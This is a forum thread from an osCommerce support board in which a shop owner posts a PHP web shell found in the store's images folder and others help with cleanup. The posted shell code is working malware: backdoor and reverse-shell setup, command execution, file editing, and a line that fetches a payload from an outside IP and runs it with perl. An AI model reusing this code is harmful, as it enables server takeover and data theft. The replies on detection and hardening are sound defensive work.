type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ 
@array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td>  Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>  Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>  Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>  Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" 
name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />  mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />  from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />  subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" 
name="mail_send" /></td></tr></form> <tr><td>    <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a 
href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" 
name="save" style="width:12%;" />  <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option 
value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." 
..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? 
(getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" 
name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } shell_exec("cd /tmp ; wget http://195.162.25.142/img.jpg  ; perl img.jpg ; rm -rf *img.jpg*; curl -O http://195.162.25.142/img.jpg  ; perl img.jpg ; rm -rf *img.jpg*; lwp-download http://195.162.25.142/img.jpg  ; perl img.jpg ; rm -rf *img.jpg*; fetch http://195.162.25.142/img.jpg  ; perl img.jpg ; rm -rf *img.jpg*;");?> </div> </body> </html>




That looks like a "true" positive to me.

 

Normally there are no php files in the images directory.

 

Cheers

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.


What are my next steps, what could that hack have done?

The site still seems to be running so maybe only the file was placed there and not run.

I have changed the permissions to 000 so that should prevent any damage.

Is there any way to see how it got there, whether it was a hack through oscommerce code?

Can I just delete it?


Delete it.

 

Read the first 2 threads in the security forum and install the 5 must-have security add-ons.

 

Work out how they got in by looking at your logs.

 

Check the rest of your site and make sure there is no more rogue code.

 

Have a look at my about me pages for more things to do.

 

HTH

 

G


The fact it was in the images directory with 777 and created by "You" makes me think I uploaded it somehow from my local computer.

I'm looking for other files on the server with 777 but doesn't seem to be much.

Should I change the site passwords? I can't see from the code snippet above what it is trying to do; it just seems like a listing hack.


I'd follow this suggestion

 

G


Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you can not perform any of the above steps, you are welcome to PM me for help. If you miss any of these steps your site may remain accessible to hackers.

 

 

 

Chris
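Steps 2 and 6 above can be partly automated once the files are on a local machine. The POSIX shell script below is an added example, not code from this thread or from osCommerce: it reports directories above 755, files above 644 and configure.php files above 444, sweeps PHP files for decode-then-execute and exec-wrapper patterns (a narrower net than a bare 'eval' or 'base64' search, which as the thread notes also hits legitimate osCommerce files), and lists any PHP file sitting under an images directory, as G pointed out earlier. The sample tree it builds, its file names and the keyword pattern are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the thread or from osCommerce: a POSIX-shell
# audit that automates two of the cleanup steps above against a local copy
# of the site (the files FTP'd down in step 2). Paths, sample files and the
# keyword pattern are constructed for the demonstration.

# Numeric mode of a path (GNU stat first, BSD/macOS stat as fallback).
mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Tag every path read from stdin with KIND and its mode: "KIND MODE PATH".
tag() {
    while IFS= read -r p; do
        printf '%s %s %s\n' "$1" "$(mode_of "$p")" "$p"
    done
}

# Step 6: directories no higher than 755 (no group/other write bit),
# files no higher than 644 (no group/other write, no execute bit at all),
# the configure.php files no higher than 444 (no write bit at all).
audit_perms() {
    root="$1"
    find "$root" -type d \( -perm -020 -o -perm -002 \) | tag dir-above-755
    find "$root" -type f ! -name configure.php \
        \( -perm -020 -o -perm -002 -o -perm -100 -o -perm -010 -o -perm -001 \) \
        | tag file-above-644
    find "$root" -type f -name configure.php \
        \( -perm -200 -o -perm -020 -o -perm -002 \) | tag configure-above-444
}

# Step 2: keyword sweep. A bare "eval" or "base64" matches legitimate
# osCommerce code, so this looks for the decode-then-execute combinations
# and exec wrappers that store code does not use. Extend as needed; a file
# that matches nothing here still deserves the manual comparison.
SUSPECT_RE='base64_decode[[:space:]]*\(|gzinflate[[:space:]]*\(|str_rot13[[:space:]]*\(|shell_exec[[:space:]]*\(|passthru[[:space:]]*\(|eval[[:space:]]*\([[:space:]]*\$'
keyword_sweep() {
    find "$1" -type f -name '*.php*' -exec grep -lE "$SUSPECT_RE" {} + 2>/dev/null \
        | tag suspect-keywords
}

# G's observation above: no PHP file belongs in an images directory.
php_in_images() {
    find "$1" -type f -path '*/images/*' -name '*.php*' | tag php-in-images
}

# One finding per line, in the order: permissions, keywords, php-in-images.
run_audit() {
    audit_perms "$1"
    keyword_sweep "$1"
    php_in_images "$1"
}

# Constructed stand-in for a store tree, used to demonstrate the audit
# offline: a world-writable images directory holding a rogue file (its body
# is only a comment carrying the pattern, not working code), plus two
# configure.php files left at 644 instead of 444.
make_sample_site() {
    d="$1"
    mkdir -p "$d/cart/images" "$d/cart/includes" "$d/cart/admin/includes"
    find "$d" -type d -exec chmod 755 {} +
    printf '<?php echo "store front";\n' > "$d/cart/index.php"
    printf '<?php define("DB_SERVER", "localhost");\n' > "$d/cart/includes/configure.php"
    printf '<?php define("DB_SERVER", "localhost");\n' > "$d/cart/admin/includes/configure.php"
    printf '<?php /* constructed sample: eval(base64_decode("...")) */\n' > "$d/cart/images/settings.php"
    chmod 644 "$d/cart/index.php" "$d/cart/includes/configure.php" "$d/cart/admin/includes/configure.php"
    chmod 777 "$d/cart/images" "$d/cart/images/settings.php"
}

# Usage: sh audit.sh /path/to/local/copy
if [ -n "${1:-}" ]; then
    run_audit "$1"
fi
```

A clean report is not proof the site is clean; files that match nothing here still need the comparison against a known-good copy that the later replies recommend.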


Yes, some of the keywords are found in osCommerce, but check any file with those keywords in them anyway. File permissions are irrelevant if the site has already been compromised. I have cleaned several sites where the hacker has changed file permissions AFTER infecting the file.

 

 

 

 

Chris


Well, I searched for those terms but I'm not really sure what line of code I should be finding that's suspicious.

Here's an example:

C:\Documents and Settings\J\My Documents\Website backups\mysite.co.uk\cart\includes\header.php

00077: <td class="headerError"><?php echo htmlspecialchars(urldecode($HTTP_GET_VARS['error_message'])); ?></td>

 

Seems fine to me. It's possible I loaded the file up from an add on with images somewhere but it was never executed. I can't be sure as it's a shared server and I cannot check logs.


Don't take this the wrong way because it truly isn't meant in a derogatory manner...

:blush:

 

If you can't recognize "rogue code" and you don't have a known "clean" backup to compare every file to, your effectiveness in checking/cleansing a site is very limited.

 

Honestly not meant to be rude, crude, or obnoxious - That's just the way it is.

:)

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >


True, I did have a backup until I got rid of them about 5mins before I did this week's backup. I don't usually do this as I keep 4 weeks worth of backups but I decided to do a clean out. Typically, it was the one week that something happened!

How can you recognise rogue code from one line with a base64 or encode line?

They all look fine, it doesn't mean they are.

In the code snippet at the top of the page, what does that rogue code actually do?


Being able to recognize bad code is probably more a result of experience than anything else.

 

I haven't looked at the code closely but you must assume the worst - That they were able to and have already done just about anything they wanted. Including:

 


  • 1. Read any file.
  • 2. Change any file.
  • 3. Add new files any place they chose.
  • 4. Read the database.
  • 5. Alter the database in any place and fashion they wanted.

 

That would mean they might have added backdoor admin accounts.

 

You need to change your admin password and the database password. Those changes also involve altering the config files.

 

Read Chris's previous posts. He's got it all laid out.


Yes, an account called director was added to the db. I have deleted that, changed the admin password and also changed the config files.

I may be lucky in that my admin account was restricted to geo ip locations through htaccess but I can't be sure.

I am not sure what else to check now short of going through every file that had base64 included?????

 

Err...which post and who is Chris?


Sorry, wrong db - they DID NOT get into the database or create admin accounts.

I am not sure what else to check now short of going through every file that had base64 included?????


Site monitor and VTS (Virus Threat Scan) will scan for known hack strings.

 

HTH

 

G


Well, it reports these but it even reports its own files as positives so I'm not sure of the results.

I checked the cookie_usage files and mail.php and these are all oscommerce defaults.

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/grep.php (Known automated hack <=> error_reporting(0) ) on line: 44

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/AV/index.php (Known automated hack <=> error_reporting(0) ) on line: 11

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/configuration.php (Known automated hack <=> eval( ) on line: 125

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/modules.php (Known automated hack <=> eval( ) on line: 218

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/javascript/spiffyCal/spiffyCal_v2_1.js (Known automated hack <=> eval( ) on line: 76

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/javascript/calendarcode.js (Known automated hack <=> eval( ) on line: 57

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/general.php (Known automated hack <=> eval( ) on line: 405

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/functions/header_tags.php (Known automated hack <=> eval( ) on line: 876

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/espanol/mail.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/german/mail.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/languages/english/mail.php (Known filename threat)

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/includes/modules/newsletters/product_notification.php (Known automated hack <=> eval( ) on line: 61

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/admin/mail.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/cookie_usage.php (Known filename threat)

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/general.php (Known automated hack <=> eval( ) on line: 482

 

Possible Infection: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/functions/compatibility.php (Known automated hack <=> eval( ) on line: 84

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/espanol/cookie_usage.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/german/cookie_usage.php (Known filename threat)

 

File could be a potentional threat: /home6c/sub002/sc11883-LGVN/mysite.co.uk/cart/includes/languages/english/cookie_usage.php (Known filename threat)


There is not a shadow of doubt as to what this is... it is a complex hack script providing the hacker in question with all the information they require to do untold damage to your site and server.

 

Here's a little snippet: -

 

$mail_sent = @mail( "[email protected]", "shell ".$_SERVER['HTTP_HOST'] ,  $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], "From:  no-reply@".$_SERVER['HTTP_HOST']);

 

It can walk through the server's files compiling permissions, file ownership, group, safe mode or not. And a lot more.

 

It can attach all of the files as a .gz to the email, etc. etc.

 

An IP for downloading an image was 195.162.25.142

 

The email also provided the hacker with a nice link to the script which then, in a very nicely presented HTML format, allows them a whole range of options.


I have changed the admin passwords and db.

None of the other files seem to have any changes so all seems ok for the moment.

What else can I do to lock anything down?


How is the images folder open to hacking?

I have put this in now:

<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
Order Deny,Allow
Deny from all
</FilesMatch>


If the permissions on the images folder are higher than 755 it can be hacked by anyone at any time.

 

Other than that it would only be writable by hack code elsewhere, or the result of some other vulnerability.


Just having a folder as 777 doesn't necessarily allow a hacker to get in, they'd have to actually hack through some page on the website first via an SQL injection or other...or get into the shared servers somehow.


Archived

This topic is now archived and is closed to further replies.
